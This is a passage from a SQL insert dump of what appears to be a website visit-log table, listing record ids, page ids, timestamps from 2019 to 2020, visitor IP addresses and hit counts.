17:26:00','144.51.12.10',2),(5025,10,'2019-09-17 03:10:30','173.73.252.124',5),(5026,8,'2019-09-17 05:09:53','17.58.97.78',2),(5027,6,'2019-09-17 17:56:35','66.249.75.114',6),(5028,7,'2019-09-17 21:25:23','107.77.232.13',4),(5029,10,'2019-09-18 11:29:16','17.58.97.78',1),(5030,6,'2019-09-18 19:06:43','184.154.36.185',1),(5031,7,'2019-09-19 05:39:21','66.249.75.114',3),(5032,10,'2019-09-19 13:40:15','40.77.167.78',5),(5033,8,'2019-09-19 17:16:54','38.93.172.60',3),(5034,6,'2019-09-19 19:08:27','184.154.36.185',6),(5035,7,'2019-09-20 06:01:38','93.158.161.128',4),(5036,10,'2019-09-20 16:30:19','99.203.89.104',6),(5037,8,'2019-09-20 17:37:06','34.77.23.225',2),(5038,6,'2019-09-21 06:14:02','23.82.28.28',2),(5039,7,'2019-09-21 06:14:12','23.82.28.28',1),(5040,6,'2019-09-22 13:57:55','13.66.139.0',4),(5041,7,'2019-09-22 21:58:32','17.58.97.78',3),(5042,10,'2019-09-23 02:56:47','68.9.50.5',4),(5043,8,'2019-09-23 14:23:17','138.197.64.43',2),(5044,6,'2019-09-23 14:23:19','138.197.64.43',7),(5045,7,'2019-09-23 22:09:40','66.249.75.114',4),(5046,10,'2019-09-24 14:24:44','52.232.125.66',4),(5047,6,'2019-09-24 20:23:26','207.46.13.0',7),(5048,8,'2019-09-25 04:31:20','207.46.13.224',3),(5049,7,'2019-09-25 08:56:28','104.239.4.137',1),(5050,10,'2019-09-25 17:23:13','207.46.13.34',3),(5051,6,'2019-09-26 03:39:59','66.249.75.114',4),(5052,8,'2019-09-26 16:12:05','157.55.39.249',3),(5053,10,'2019-09-27 01:07:12','104.236.62.205',2),(5054,7,'2019-09-27 01:07:12','104.236.62.205',6),(5055,6,'2019-09-27 04:09:10','157.55.39.145',3),(5056,8,'2019-09-27 19:12:10','184.154.36.183',3),(5057,10,'2019-09-28 11:35:19','76.100.49.21',3),(5058,7,'2019-09-28 15:29:24','52.162.213.79',2),(5059,6,'2019-09-28 19:03:48','184.154.36.186',2),(5060,6,'2019-09-29 19:05:21','184.154.36.171',3),(5061,10,'2019-09-29 21:29:46','40.77.167.119',4),(5062,7,'2019-09-29 23:49:04','174.50.20.32',1),(5063,8,'2019-09-30 10:49:46','129.241.229.62',2),(5064,6,'2019-09-30 21:13:22','31.210.170.131',3),(5065,10,'2019-09-30 23:37:01','174.205.17.21',3),(5066,6,'2019-10-02 02:04:01','173.69.174.232',3),(5067,7,'2019-10-02 19:21:40','66.249.69.210',3),(5068,10,'2019-10-03 10:28:59','107.77.203.210',4),(5069,8,'2019-10-03 15:37:22','38.135.200.81',4),(5070,6,'2019-10-03 19:11:04','184.154.36.171',8),(5071,7,'2019-10-03 19:35:49','23.252.240.104',6),(5072,10,'2019-10-04 14:31:00','153.31.112.24',2),(5073,6,'2019-10-05 03:56:17','17.58.97.78',5),(5074,10,'2019-10-05 16:32:49','40.77.167.88',3),(5075,6,'2019-10-06 11:34:22','66.249.75.74',4),(5076,7,'2019-10-06 16:31:35','93.158.161.11',3),(5077,8,'2019-10-07 16:26:12','38.128.157.82',4),(5078,10,'2019-10-07 16:41:29','144.51.12.10',6),(5079,6,'2019-10-07 17:42:12','199.188.118.249',4),(5080,7,'2019-10-07 17:45:53','104.192.74.238',1),(5081,6,'2019-10-08 19:04:00','184.154.36.171',1),(5082,8,'2019-10-08 19:32:00','52.12.52.0',1),(5083,10,'2019-10-09 02:14:31','172.58.75.144',3),(5084,7,'2019-10-09 04:42:46','157.55.39.75',4),(5085,6,'2019-10-09 19:04:43','184.154.139.20',2),(5086,8,'2019-10-10 10:00:22','17.58.97.78',1),(5087,10,'2019-10-10 12:56:57','167.102.245.34',4),(5088,6,'2019-10-10 19:17:15','184.154.139.19',4),(5089,7,'2019-10-11 01:36:53','167.114.209.28',6),(5090,10,'2019-10-11 15:50:05','74.92.155.237',2),(5091,6,'2019-10-11 19:47:54','66.249.69.114',4),(5092,10,'2019-10-12 17:27:05','172.58.188.148',3),(5093,7,'2019-10-13 05:43:09','66.249.75.74',5),(5094,6,'2019-10-13 19:05:14','184.154.139.3',4),(5095,10,'2019-10-14 00:59:35','142.4.218.156',9),(5096,10,'2019-10-15 03:17:45','69.250.93.243',3),(5097,6,'2019-10-15 15:43:16','40.77.167.45',3),(5098,7,'2019-10-16 01:10:19','172.58.109.198',6),(5099,10,'2019-10-16 16:12:49','214.3.138.230',10),(5100,6,'2019-10-16 20:33:53','66.249.69.116',8),(5101,7,'2019-10-17 18:48:23','104.239.6.250',2),(5102,10,'2019-10-17 19:06:18','184.154.139.18',6),(5103,6,'2019-10-18 12:00:32','13.66.139.0',5),(5104,10,'2019-10-19 19:14:58','184.154.139.20',6),(5105,7,'2019-10-20 14:54:34','167.114.90.33',3),(5106,6,'2019-10-20 14:54:58','167.114.90.33',5),(5107,10,'2019-10-21 19:08:43','184.154.139.17',6),(5108,7,'2019-10-22 13:23:38','24.244.156.186',4),(5109,10,'2019-10-22 21:05:18','74.231.188.111',2),(5110,6,'2019-10-23 23:58:15','138.197.3.203',2),(5111,7,'2019-10-23 23:58:16','138.197.3.203',3),(5112,10,'2019-10-23 23:58:17','138.197.3.203',6),(5113,7,'2019-10-25 03:22:26','207.68.254.253',3),(5114,10,'2019-10-25 05:25:30','152.7.255.226',4),(5115,6,'2019-10-25 14:26:06','66.249.75.114',5),(5116,10,'2019-10-26 13:20:16','174.232.129.64',4),(5117,6,'2019-10-27 02:53:53','66.249.75.118',12),(5118,10,'2019-10-27 16:45:20','38.93.172.240',4),(5119,7,'2019-10-27 16:48:00','149.100.187.98',3),(5120,10,'2019-10-28 19:10:46','184.154.139.19',2),(5121,6,'2019-10-28 19:10:54','184.154.139.19',4),(5122,7,'2019-10-29 04:09:13','52.162.211.179',3),(5123,6,'2019-10-30 00:20:53','71.179.35.88',4),(5124,7,'2019-10-30 17:48:06','216.173.66.142',1),(5125,10,'2019-10-30 17:50:27','104.239.4.83',2),(5126,6,'2019-10-31 02:13:58','52.73.200.208',5),(5127,10,'2019-10-31 23:20:33','69.250.73.57',6),(5128,7,'2019-11-01 00:09:47','172.58.188.146',1),(5129,6,'2019-11-01 16:27:47','50.255.90.54',3),(5130,10,'2019-11-02 04:15:03','104.236.70.129',1),(5131,7,'2019-11-02 04:15:03','104.236.70.129',5),(5132,6,'2019-11-02 19:05:50','184.154.139.20',2),(5133,7,'2019-11-03 20:08:31','184.154.139.20',3),(5134,6,'2019-11-03 20:08:42','184.154.139.20',2),(5135,10,'2019-11-04 00:23:59','207.46.13.128',6),(5136,6,'2019-11-04 22:47:03','100.16.224.236',10),(5137,10,'2019-11-05 01:47:00','71.114.10.139',8),(5138,7,'2019-11-05 01:47:15','71.114.10.139',6),(5139,6,'2019-11-06 06:21:20','66.249.75.52',4),(5140,7,'2019-11-06 06:40:15','17.58.97.78',7),(5141,10,'2019-11-06 12:46:06','162.129.250.38',4),(5142,6,'2019-11-07 07:22:47','117.69.24.101',5),(5143,7,'2019-11-07 08:40:11','5.9.110.227',2),(5144,10,'2019-11-07 22:19:03','23.252.241.157',2),(5145,7,'2019-11-08 12:49:14','73.128.242.171',5),(5146,6,'2019-11-08 20:03:22','184.154.139.18',1),(5147,10,'2019-11-09 20:05:00','184.154.139.17',8),(5148,7,'2019-11-10 14:47:36','185.157.82.229',5),(5149,6,'2019-11-10 17:29:00','142.44.167.89',3),(5150,10,'2019-11-10 20:05:40','184.154.139.21',4),(5151,10,'2019-11-11 20:05:57','184.154.139.20',6),(5152,7,'2019-11-11 21:31:24','38.128.159.16',5),(5153,6,'2019-11-12 00:05:34','38.93.172.241',6),(5154,6,'2019-11-13 04:32:08','35.210.220.237',8),(5155,7,'2019-11-13 04:40:33','35.210.220.237',7),(5156,10,'2019-11-13 04:40:56','35.210.220.237',7),(5157,7,'2019-11-14 08:12:50','66.249.75.74',7),(5158,6,'2019-11-14 14:30:29','40.77.167.184',2),(5159,10,'2019-11-14 16:04:42','192.30.51.10',3),(5160,10,'2019-11-15 20:05:24','184.154.139.18',6),(5161,6,'2019-11-16 05:04:32','173.69.150.59',3),(5162,10,'2019-11-16 20:10:49','184.154.139.20',2),(5163,7,'2019-11-17 14:59:26','96.19.130.23',5),(5164,6,'2019-11-18 05:55:57','54.146.43.69',4),(5165,10,'2019-11-18 14:28:45','17.58.97.88',4),(5166,7,'2019-11-18 18:57:14','104.239.4.88',7),(5167,6,'2019-11-19 07:28:34','158.69.225.36',11),(5168,10,'2019-11-19 14:42:35','35.187.87.41',2),(5169,7,'2019-11-19 23:29:52','40.77.167.120',5),(5170,6,'2019-11-20 08:42:19','185.255.96.99',3),(5171,10,'2019-11-20 19:35:30','66.249.75.78',4),(5172,7,'2019-11-21 13:57:56','207.46.13.136',1),(5173,6,'2019-11-21 20:02:24','184.154.139.20',1),(5174,6,'2019-11-22 20:04:55','184.154.139.18',5),(5175,10,'2019-11-23 19:25:15','165.227.210.230',3),(5176,7,'2019-11-23 19:25:17','165.227.210.230',2),(5177,6,'2019-11-24 01:20:45','66.249.75.76',8),(5178,10,'2019-11-25 06:11:41','69.143.215.119',5),(5179,6,'2019-11-25 20:09:11','184.154.139.18',6),(5180,7,'2019-11-26 00:12:34','38.135.104.133',5),(5181,10,'2019-11-26 14:32:09','38.93.172.113',8),(5182,6,'2019-11-26 20:59:51','38.77.197.238',6),(5183,10,'2019-11-27 17:57:55','66.249.75.76',4),(5184,7,'2019-11-27 18:11:56','17.58.97.88',6),(5185,6,'2019-11-27 23:06:32','66.249.75.74',4),(5186,10,'2019-11-28 20:08:57','184.154.139.17',6),(5187,7,'2019-11-28 23:12:12','66.249.75.78',2),(5188,6,'2019-11-29 17:02:06','66.249.75.78',6),(5189,10,'2019-11-29 20:16:01','184.154.139.20',7),(5190,7,'2019-11-30 11:23:57','66.249.70.52',6),(5191,10,'2019-12-01 09:59:41','104.239.0.242',2),(5192,6,'2019-12-01 11:25:38','157.55.39.121',4),(5193,7,'2019-12-01 22:55:11','66.249.70.54',8),(5194,6,'2019-12-02 16:13:11','152.120.146.114',6),(5195,10,'2019-12-02 20:04:39','184.154.139.18',6),(5196,7,'2019-12-03 00:14:51','66.231.185.75',6),(5197,10,'2019-12-03 20:12:26','184.154.139.21',5),(5198,6,'2019-12-04 00:51:12','91.106.199.104',6),(5199,7,'2019-12-04 04:00:39','138.197.64.48',3),(5200,6,'2019-12-05 12:24:46','73.91.241.245',6),(5201,10,'2019-12-05 13:54:51','38.101.39.157',14),(5202,7,'2019-12-06 13:33:28','107.77.201.108',4),(5203,6,'2019-12-06 17:04:10','38.101.39.160',6),(5204,10,'2019-12-06 20:05:26','184.154.139.3',4),(5205,10,'2019-12-07 20:08:07','184.154.139.21',7),(5206,7,'2019-12-08 01:26:21','40.77.167.57',3),(5207,6,'2019-12-08 13:55:27','66.249.75.64',1),(5208,10,'2019-12-09 01:16:53','157.55.39.196',4),(5209,6,'2019-12-09 16:38:39','77.88.5.17',6),(5210,7,'2019-12-09 21:08:11','149.100.190.127',1),(5211,10,'2019-12-10 04:12:14','71.162.197.143',2),(5212,6,'2019-12-11 00:24:06','66.249.75.94',5),(5213,10,'2019-12-11 04:36:02','112.113.152.109',2),(5214,7,'2019-12-11 04:36:12','117.60.49.37',2),(5215,7,'2019-12-12 05:26:33','17.58.97.78',3),(5216,6,'2019-12-12 11:59:16','66.249.75.95',6),(5217,10,'2019-12-12 16:48:11','66.249.75.95',5),(5218,7,'2019-12-13 07:42:07','220.188.27.24',4),(5219,10,'2019-12-13 20:02:46','184.154.139.20',4),(5220,6,'2019-12-14 04:36:29','66.249.75.94',2),(5221,7,'2019-12-14 15:51:18','138.197.3.203',3),(5222,10,'2019-12-14 20:11:22','184.154.139.3',5),(5223,6,'2019-12-15 10:45:29','40.77.167.221',4),(5224,7,'2019-12-15 21:35:51','40.77.167.210',4),(5225,10,'2019-12-16 01:26:31','100.16.138.21',3),(5226,6,'2019-12-16 13:29:45','66.250.190.29',7),(5227,6,'2019-12-17 15:22:18','66.249.75.64',7),(5228,7,'2019-12-17 19:04:55','40.77.167.84',3),(5229,10,'2019-12-18 03:40:52','68.134.124.158',4),(5230,6,'2019-12-18 20:10:43','184.154.139.21',14),(5231,7,'2019-12-19 13:51:31','91.242.162.82',6),(5232,10,'2019-12-19 17:46:38','40.77.167.20',3),(5233,6,'2019-12-20 00:46:36','66.220.149.17',6),(5234,6,'2019-12-21 04:37:30','173.252.79.19',6),(5235,7,'2019-12-21 13:32:44','71.178.197.69',4),(5236,10,'2019-12-21 21:49:28','58.22.210.193',3),(5237,6,'2019-12-22 06:36:39','223.104.11.29',9),(5238,7,'2019-12-23 01:12:49','207.46.13.1',3),(5239,6,'2019-12-23 07:07:54','108.251.103.85',5),(5240,10,'2019-12-23 20:14:51','184.154.139.21',4),(5241,7,'2019-12-24 01:57:57','142.93.69.33',5),(5242,6,'2019-12-24 08:27:39','54.212.52.142',8),(5243,10,'2019-12-25 00:32:15','138.197.11.87',4),(5244,6,'2019-12-25 16:11:26','66.249.75.64',8),(5245,7,'2019-12-25 17:27:16','66.249.75.95',5),(5246,10,'2019-12-26 16:57:36','73.213.194.116',5),(5247,7,'2019-12-26 17:57:07','104.239.4.52',3),(5248,6,'2019-12-26 20:12:32','184.154.139.20',12),(5249,6,'2019-12-27 20:14:02','174.254.69.69',12),(5250,7,'2019-12-27 23:08:34','17.58.97.78',3),(5251,6,'2019-12-29 03:02:12','96.234.182.232',10),(5252,10,'2019-12-29 15:08:19','17.58.97.78',4),(5253,7,'2019-12-30 01:08:18','157.55.39.211',12),(5254,6,'2019-12-30 06:58:56','38.87.147.139',12),(5255,10,'2019-12-30 19:06:20','159.138.150.237',4),(5256,7,'2019-12-31 08:29:11','159.138.151.139',2),(5257,6,'2019-12-31 11:00:55','159.138.154.192',11),(5258,10,'2019-12-31 21:59:41','40.77.167.118',4),(5259,6,'2020-01-01 12:36:02','46.119.167.20',8),(5260,6,'2020-01-02 17:49:35','157.55.39.106',7),(5261,10,'2020-01-02 21:27:27','174.205.10.106',2),(5262,6,'2020-01-03 20:05:45','184.154.139.20',10),(5263,10,'2020-01-03 21:39:33','131.171.200.183',1),(5264,7,'2020-01-04 00:20:25','17.58.97.77',1),(5265,6,'2020-01-04 20:11:59','184.154.139.20',5),(5266,10,'2020-01-05 05:35:13','172.58.187.189',4),(5267,7,'2020-01-05 11:57:55','157.55.39.205',1),(5268,6,'2020-01-05 20:19:05','184.154.139.19',7),(5269,10,'2020-01-06 17:11:18','73.138.198.29',5),(5270,6,'2020-01-07 00:37:19','107.172.228.135',9),(5271,7,'2020-01-07 00:37:27','107.172.228.135',4),(5272,10,'2020-01-07 18:10:58','38.128.159.239',4),(5273,6,'2020-01-08 03:34:20','47.20.31.247',15),(5274,7,'2020-01-08 08:22:20','157.55.39.201',3),(5275,10,'2020-01-08 22:29:16','138.88.130.180',3),(5276,6,'2020-01-09 05:05:30','128.71.88.215',8),(5277,7,'2020-01-09 20:12:58','184.154.139.18',2),(5278,6,'2020-01-10 08:09:46','17.58.97.77',8),(5279,10,'2020-01-10 18:19:35','66.249.75.23',9),(5280,7,'2020-01-11 01:10:33','159.138.157.203',4),(5281,6,'2020-01-11 08:34:53','138.201.11.237',7),(5282,10,'2020-01-11 23:25:30','17.58.97.77',4),(5283,7,'2020-01-12 01:41:34','35.206.169.219',6),(5284,6,'2020-01-12 09:53:11','155.94.176.91',12),(5285,10,'2020-01-13 00:42:32','173.69.171.10',12),(5286,7,'2020-01-13 02:07:27','66.249.75.54',4),(5287,6,'2020-01-13 11:40:56','40.77.167.174',15),(5288,10,'2020-01-14 03:08:51','73.133.150.81',11),(5289,7,'2020-01-14 06:34:51','66.249.75.50',7),(5290,6,'2020-01-14 12:40:52','66.249.75.37',12),(5291,6,'2020-01-15 12:42:25','46.118.122.221',9),(5292,10,'2020-01-15 17:36:12','159.138.152.228',10),(5293,7,'2020-01-16 05:49:30','157.55.39.113',4),(5294,6,'2020-01-16 13:22:15','185.206.225.34',11),(5295,10,'2020-01-17 00:50:44','114.119.131.252',4),(5296,7,'2020-01-17 10:12:43','66.249.75.94',1),(5297,6,'2020-01-17 14:37:29','54.146.43.69',7),(5298,10,'2020-01-18 01:52:08','100.15.121.209',6),(5299,6,'2020-01-18 23:33:26','109.234.34.254',23),(5300,10,'2020-01-19 13:47:36','73.172.63.14',8),(5301,7,'2020-01-19 13:48:44','73.172.63.14',6),(5302,6,'2020-01-20 01:01:49','69.171.251.12',10),(5303,10,'2020-01-20 19:17:44','159.138.150.69',6),(5304,7,'2020-01-20 23:35:36','66.249.75.23',2),(5305,6,'2020-01-21 01:23:01','73.185.246.205',16),(5306,10,'2020-01-21 20:03:41','184.154.139.21',7),(5307,6,'2020-01-22 02:33:54','5.138.195.11',19),(5308,7,'2020-01-22 09:42:37','66.249.75.76',2),(5309,10,'2020-01-22 20:03:46','184.154.139.18',4),(5310,6,'2020-01-23 03:20:47','173.120.193.6',13),(5311,7,'2020-01-24 02:42:30','66.249.75.142',5),(5312,10,'2020-01-24 03:36:02','71.114.10.139',6),(5313,6,'2020-01-24 05:28:09','46.200.63.194',12),(5314,7,'2020-01-25 03:04:29','71.244.158.87',3),(5315,6,'2020-01-25 11:02:11','31.173.82.2',23),(5316,10,'2020-01-25 20:04:59','207.46.13.9',5),(5317,6,'2020-01-26 17:33:01','157.55.39.222',20),(5318,7,'2020-01-26 20:03:26','184.154.139.3',2),(5319,10,'2020-01-27 16:32:50','159.138.158.152',7),(5320,6,'2020-01-27 18:04:40','73.133.149.146',21),(5321,7,'2020-01-28 17:04:18','40.77.167.43',4),(5322,10,'2020-01-28 17:43:30','159.138.128.76',2),(5323,6,'2020-01-28 18:45:02','46.148.26.211',20),(5324,6,'2020-01-29 19:40:44','205.156.36.13',17),(5325,10,'2020-01-29 20:47:56','184.154.139.20',5),(5326,7,'2020-01-30 18:04:34','23.94.139.59',1),(5327,6,'2020-01-31 00:48:19','96.244.131.237',9),(5328,10,'2020-01-31 07:30:31','40.77.167.33',4),(5329,7,'2020-01-31 20:01:18','184.154.139.19',2),(5330,6,'2020-02-01 02:56:43','185.220.70.131',13),(5331,10,'2020-02-01 20:03:33','184.154.139.19',11),(5332,6,'2020-02-02 07:47:39','128.70.226.228',14),(5333,7,'2020-02-02 10:43:38','3.213.96.39',5),(5334,10,'2020-02-02 20:11:50','184.154.139.17',6),(5335,6,'2020-02-03 08:32:25','69.140.137.125',12),(5336,7,'2020-02-03 13:26:03','45.55.58.76',4),(5337,10,'2020-02-03 22:56:38','149.100.187.119',2),(5338,6,'2020-02-04 13:03:53','134.192.250.47',16),(5339,7,'2020-02-04 22:58:58','17.58.97.77',2),(5340,10,'2020-02-05 00:23:54','95.216.157.224',3),(5341,6,'2020-02-05 13:20:24','165.231.108.72',11),(5342,10,'2020-02-06 02:30:59','100.15.121.209',3),(5343,7,'2020-02-06 05:31:23','66.249.75.64',2),(5344,6,'2020-02-06 13:48:24','79.142.196.152',12),(5345,10,'2020-02-07 04:52:05','100.16.247.203',3),(5346,7,'2020-02-07 11:44:47','114.119.153.250',4),(5347,6,'2020-02-07 14:09:23','37.147.67.13',10),(5348,7,'2020-02-08 17:14:09','107.77.236.99',4),(5349,10,'2020-02-08 20:08:37','184.154.139.17',6),(5350,6,'2020-02-08 20:09:15','184.154.139.17',7),(5351,6,'2020-02-09 20:11:09','184.154.139.19',31),(5352,6,'2020-02-10 23:16:18','46.243.220.103',17),(5353,10,'2020-02-11 00:29:56','173.69.150.59',8),(5354,7,'2020-02-11 10:04:27','107.158.84.246',3),(5355,6,'2020-02-12 01:21:42','37.115.251.163',21),(5356,10,'2020-02-12 02:53:57','17.58.97.77',5),(5357,7,'2020-02-12 11:17:11','138.197.2.91',3),(5358,6,'2020-02-13 03:03:15','31.13.103.21',26),(5359,10,'2020-02-13 09:48:52','114.119.163.253',7),(5360,7,'2020-02-13 14:36:11','40.77.167.74',7),(5361,6,'2020-02-14 04:30:49','73.180.221.15',17),(5362,10,'2020-02-14 11:08:49','66.249.75.116',8),(5363,7,'2020-02-14 22:00:27','159.138.155.33',4),(5364,6,'2020-02-15 16:50:57','99.203.202.10',10),(5365,10,'2020-02-15 17:50:36','66.249.75.118',5),(5366,7,'2020-02-16 01:12:35','66.249.75.118',4),(5367,6,'2020-02-16 18:46:26','96.244.131.237',19),(5368,10,'2020-02-16 20:09:42','184.154.139.21',3),(5369,7,'2020-02-17 04:46:33','114.119.164.194',2),(5370,6,'2020-02-17 21:52:25','38.128.159.70',12),(5371,10,'2020-02-18 15:45:42','129.2.33.99',7),(5372,6,'2020-02-18 22:20:29','217.20.185.69',21),(5373,7,'2020-02-19 06:44:42','107.175.141.194',3),(5374,10,'2020-02-19 20:03:00','168.245.155.24',2),(5375,6,'2020-02-19 22:22:07','73.173.96.255',5),(5376,7,'2020-02-20 15:01:24','38.77.197.211',3),(5377,10,'2020-02-20 20:07:45','184.154.139.17',3),(5378,6,'2020-02-21 01:34:28','172.241.131.135',11),(5379,7,'2020-02-22 00:21:29','159.138.128.106',2),(5380,6,'2020-02-22 01:41:17','72.81.137.185',10),(5381,10,'2020-02-22 01:51:13','73.160.245.206',3),(5382,6,'2020-02-23 12:53:19','46.243.220.103',8),(5383,10,'2020-02-23 20:13:45','184.154.139.18',3),(5384,7,'2020-02-23 21:40:59','73.250.71.119',4),(5385,6,'2020-02-24 14:46:45','176.14.20.161',22),(5386,7,'2020-02-24 22:28:16','172.58.188.83',4),(5387,10,'2020-02-25 03:28:03','199.188.118.30',8),(5388,6,'2020-02-25 16:12:26','128.71.163.233',25),(5389,7,'2020-02-25 22:39:06','17.58.97.77',3),(5390,10,'2020-02-26 13:03:52','114.119.138.253',3),(5391,6,'2020-02-26 19:09:25','40.77.167.136',7),(5392,7,'2020-02-27 13:15:19','66.249.75.114',1),(5393,6,'2020-02-27 20:03:16','184.154.139.21',13),(5394,10,'2020-02-28 11:53:35','5.102.173.71',1),(5395,6,'2020-02-28 20:13:32','184.154.139.3',21),(5396,7,'2020-02-28 20:33:03','207.46.13.77',2),(5397,10,'2020-02-29 16:54:10','108.51.130.111',3),(5398,6,'2020-03-01 06:53:29','184.168.193.141',13),(5399,6,'2020-03-02 14:36:34','38.146.201.160',32),(5400,7,'2020-03-02 18:33:35','114.103.176.59',5),(5401,10,'2020-03-02 19:47:38','68.134.118.83',4),(5402,6,'2020-03-03 17:47:26','198.51.197.42',15),(5403,7,'2020-03-03 21:13:57','216.173.66.42',2),(5404,10,'2020-03-03 22:55:13','38.128.159.125',4),(5405,6,'2020-03-04 19:52:58','205.167.186.197',11),(5406,6,'2020-03-05 20:04:50','184.154.139.17',18),(5407,7,'2020-03-05 20:43:30','114.119.162.92',3),(5408,10,'2020-03-06 06:23:14','114.230.106.175',3),(5409,6,'2020-03-06 20:12:01','104.238.46.28',13),(5410,7,'2020-03-06 23:15:00','220.177.3.46',2),(5411,10,'2020-03-07 20:02:03','184.154.139.3',5),(5412,6,'2020-03-07 23:28:32','23.239.202.214',9),(5413,7,'2020-03-07 23:28:35','23.239.202.214',4),(5414,6,'2020-03-08 23:52:59','198.46.212.90',16),(5415,7,'2020-03-09 08:05:35','114.119.164.13',2),(5416,10,'2020-03-09 15:35:49','96.5.121.250',2),(5417,6,'2020-03-10 02:19:46','173.64.65.54',13),(5418,7,'2020-03-10 16:20:59','222.90.86.118',3),(5419,6,'2020-03-11 02:36:36','89.187.178.204',15),(5420,10,'2020-03-11 03:09:53','17.58.97.77',4),(5421,6,'2020-03-12 04:32:58','71.121.250.35',13),(5422,10,'2020-03-12 15:56:04','114.119.167.73',3),(5423,6,'2020-03-13 07:41:42','78.107.195.137',11),(5424,7,'2020-03-13 11:58:45','66.249.75.104',4),(5425,6,'2020-03-14 15:25:08','185.191.215.99',16),(5426,10,'2020-03-14 17:00:12','46.161.27.210',4),(5427,7,'2020-03-14 17:00:44','46.161.27.210',5),(5428,7,'2020-03-15 17:34:22','114.119.161.39',4),(5429,10,'2020-03-15 20:26:17','107.77.203.94',3),(5430,6,'2020-03-15 21:23:01','73.133.150.205',16),(5431,6,'2020-03-16 21:48:01','73.213.4.150',15),(5432,7,'2020-03-16 22:38:58','111.124.233.250',2),(5433,10,'2020-03-16 22:49:27','151.106.1.250',1),(5434,6,'2020-03-17 23:23:15','114.119.161.39',14),(5435,10,'2020-03-18 01:00:01','114.119.162.150',1),(5436,7,'2020-03-18 21:15:17','68.33.178.41',4),(5437,6,'2020-03-19 01:06:41','100.36.76.49',27),(5438,7,'2020-03-20 04:02:14','114.119.167.73',3),(5439,6,'2020-03-20 04:44:48','84.17.59.180',9),(5440,10,'2020-03-21 00:14:03','66.249.75.108',3),(5441,6,'2020-03-21 05:26:29','51.132.9.95',15),(5442,7,'2020-03-21 11:02:23','66.249.75.104',2),(5443,10,'2020-03-22 12:25:48','40.77.167.128',2),(5444,6,'2020-03-22 14:10:16','46.185.119.151',17),(5445,7,'2020-03-22 16:35:28','157.55.39.79',2),(5446,10,'2020-03-23 14:29:46','114.119.161.39',4),(5447,7,'2020-03-23 17:17:25','157.55.39.58',7),(5448,6,'2020-03-23 18:46:13','96.234.182.197',14),(5449,6,'2020-03-24 18:58:08','72.81.137.185',18),(5450,10,'2020-03-25 07:46:02','17.58.97.76',3),(5451,7,'2020-03-25 10:09:20','114.119.164.13',6),(5452,6,'2020-03-25 19:01:19','42.242.10.82',13),(5453,6,'2020-03-26 19:03:16','71.121.241.176',16),(5454,10,'2020-03-26 20:55:30','37.17.172.158',2),(5455,7,'2020-03-26 21:03:26','37.17.172.149',2),(5456,6,'2020-03-29 17:21:00','71.163.49.143',84),(5457,10,'2020-03-29 19:53:44','54.215.241.82',2),(5458,7,'2020-03-29 19:53:45','54.215.241.82',3),(5459,6,'2020-03-30 19:33:35','151.106.54.34',14),(5460,10,'2020-03-31 16:36:37','40.77.167.47',2),(5461,7,'2020-03-31 17:59:20','114.119.163.5',6),(5462,6,'2020-03-31 19:51:57','72.81.251.222',14),(5463,7,'2020-04-01 20:08:27','159.203.96.193',3),(5464,10,'2020-04-01 20:08:27','159.203.96.193',2),(5465,6,'2020-04-01 20:08:28','159.203.96.193',10),(5466,6,'2020-04-02 20:33:37','96.244.118.113',6),(5467,7,'2020-04-03 13:29:59','40.77.167.58',3),(5468,6,'2020-04-03 22:25:29','173.252.87.32',14),(5469,6,'2020-04-04 23:09:27','100.16.224.236',17),(5470,7,'2020-04-05 06:11:43','114.119.160.176',3),(5471,10,'2020-04-05 20:23:26','76.100.115.81',1),(5472,6,'2020-04-06 00:19:42','114.119.161.39',9),(5473,7,'2020-04-06 07:55:39','40.77.167.91',4),(5474,6,'2020-04-07 06:02:10','68.134.35.183',5),(5475,10,'2020-04-07 07:12:08','72.13.62.26',5),(5476,7,'2020-04-07 16:28:08','40.77.167.141',3),(5477,6,'2020-04-08 06:44:42','207.46.13.194',17),(5478,10,'2020-04-08 08:38:48','40.77.167.103',3),(5479,7,'2020-04-08 19:06:33','184.154.139.20',5),(5480,6,'2020-04-09 06:53:26','178.45.213.101',12),(5481,10,'2020-04-09 13:47:05','67.162.233.110',3),(5482,7,'2020-04-10 01:19:54','207.46.13.249',3),(5483,6,'2020-04-10 09:34:42','88.218.17.43',9),(5484,10,'2020-04-10 19:04:43','184.154.139.3',3),(5485,7,'2020-04-11 03:40:51','99.24.38.224',3),(5486,6,'2020-04-11 13:55:31','188.165.232.202',7),(5487,10,'2020-04-11 19:14:00','184.154.139.20',4),(5488,7,'2020-04-12 06:16:29','35.210.186.194',2),(5489,6,'2020-04-12 15:03:11','109.174.113.117',10),(5490,7,'2020-04-13 15:02:54','168.90.197.218',2),(5491,10,'2020-04-13 15:02:55','168.90.197.218',3),(5492,6,'2020-04-13 16:01:30','89.189.163.172',4),(5493,10,'2020-04-14 19:16:09','184.154.139.17',1),(5494,6,'2020-04-15 01:20:13','170.130.126.59',7),(5495,10,'2020-04-15 19:37:26','207.46.13.220',2),(5496,7,'2020-04-15 20:59:28','40.77.167.2',2),(5497,6,'2020-04-16 03:23:42','173.245.203.232',11),(5498,6,'2020-04-17 06:16:19','46.29.248.102',5),(5499,10,'2020-04-17 15:45:34','68.134.35.241',1),(5500,7,'2020-04-17 21:34:09','157.55.39.144',2),(5501,6,'2020-04-18 09:32:03','89.189.163.172',3),(5502,6,'2020-04-19 10:08:55','31.40.147.192',9),(5503,7,'2020-04-19 12:39:07','77.88.5.187',2),(5504,6,'2020-04-20 10:33:52','17.58.97.76',9),(5505,7,'2020-04-20 22:45:41','17.58.97.76',3),(5506,10,'2020-04-20 23:35:28','23.252.241.133',4),(5507,6,'2020-04-21 19:02:50','184.154.139.18',7),(5508,10,'2020-04-22 09:33:30','128.71.35.116',4),(5509,6,'2020-04-22 19:11:18','184.154.139.17',13),(5510,10,'2020-04-23 15:14:06','172.58.228.239',3),(5511,6,'2020-04-23 20:07:28','109.191.167.73',10),(5512,6,'2020-04-24 20:59:23','144.208.126.137',10),(5513,10,'2020-04-25 14:54:10','66.249.75.42',3),(5514,7,'2020-04-25 16:39:07','66.249.75.42',1),(5515,6,'2020-04-25 23:03:08','188.165.232.202',14),(5516,7,'2020-04-26 19:52:14','142.4.218.236',1),(5517,10,'2020-04-26 19:52:19','142.4.218.236',2),(5518,6,'2020-04-27 12:37:25','45.67.14.0',10),(5519,7,'2020-04-27 20:03:33','66.249.75.44',5),(5520,6,'2020-04-28 12:41:23','207.46.13.104',11),(5521,10,'2020-04-28 19:10:11','184.154.139.17',2),(5522,7,'2020-04-28 21:48:58','38.128.159.89',2),(5523,6,'2020-04-29 13:53:07','185.191.215.99',6),(5524,10,'2020-04-29 